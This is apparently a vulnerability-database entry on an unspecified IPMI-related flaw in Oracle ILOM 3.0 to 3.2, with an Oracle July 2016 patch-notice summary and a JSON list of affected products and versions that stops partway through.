Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to IPMI. A denial-of-service (DoS) attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express; Oracle Database Server; Oracle Access Manager; Oracle BI Publisher; Oracle Business Intelligence Enterprise Edition; Oracle Directory Server Enterprise Edition; Oracle Exalogic Infrastructure; Oracle Fusion Middleware; Oracle GlassFish Server; Oracle HTTP Server; Oracle JDeveloper; Oracle Portal; Oracle WebCenter Sites; Oracle WebLogic Server; Outside In Technology; Hyperion Financial Reporting; Enterprise Manager Base Platform; Enterprise Manager for Fusion Middleware; Enterprise Manager Ops Center; Oracle E-Business Suite; Oracle Agile Engineering Data Management; Oracle Agile PLM; Oracle Demand Planning; Oracle Engineering Data Management; Oracle Transportation Management; PeopleSoft Enterprise FSCM; PeopleSoft Enterprise PeopleTools; JD Edwards EnterpriseOne Tools; Siebel Applications; Oracle Fusion Applications; Oracle Communications ASAP; Oracle Communications Core Session Manager; Oracle Communications EAGLE Application Processor; Oracle Communications Messaging Server; Oracle Communications Network Charging and Control; Oracle Communications Operations Monitor; Oracle Communications Policy Management; Oracle Communications Session Border Controller; Oracle Communications Unified Session Manager; Oracle Enterprise Communications Broker; Oracle Banking Platform; Oracle Financial Services Lending and Leasing; Oracle FLEXCUBE Direct Banking; Oracle Health Sciences Clinical Development Center; Oracle Health Sciences Information Manager; Oracle Healthcare Analytics Data Integration; Oracle Healthcare Master Person Index; Oracle Documaker; Oracle Insurance Calculation Engine; Oracle Insurance Policy Administration J2EE; Oracle Insurance Rules Palette; MICROS Retail XBRi Loss Prevention; Oracle Retail Central; Oracle Back Office; Oracle Returns Management; Oracle Retail Integration Bus; Oracle Retail Order Broker; Oracle Retail Service Backbone; Oracle Retail Store Inventory Management; Oracle Utilities Framework; Oracle Utilities Network Management System; Oracle Utilities Work and Asset Management; Oracle In-Memory Policy Analytics; Oracle Policy Automation; Oracle Policy Automation Connector for Siebel; Oracle Policy Automation for Mobile Devices; Primavera Contract Management; Primavera P6 Enterprise Project Portfolio Management; Oracle Java SE; Oracle Java SE Embedded; Oracle JRockit; 40G 10G 72/64 Ethernet Switch; Fujitsu M10-1 Servers; Fujitsu M10-4 Servers; Fujitsu M10-4S Servers; ILOM; Oracle Switch ES1-24; Solaris; Solaris Cluster; SPARC Enterprise M3000 Servers; SPARC Enterprise M4000 Servers; SPARC Enterprise M5000 Servers; SPARC Enterprise M8000 Servers; SPARC Enterprise M9000 Servers; Sun Blade 6000 Ethernet Switched NEM 24P 10GE; Sun Data Center InfiniBand Switch 36; Sun Network 10GE Switch 72p; Sun Network QDR InfiniBand Gateway Switch; Oracle Secure Global Desktop; Oracle VM VirtualBox; MySQL Server. Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'IPMI' protocol. The 'IPMI' subcomponent is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is Oracle Corporation's suite of Sun system products.
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0661", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
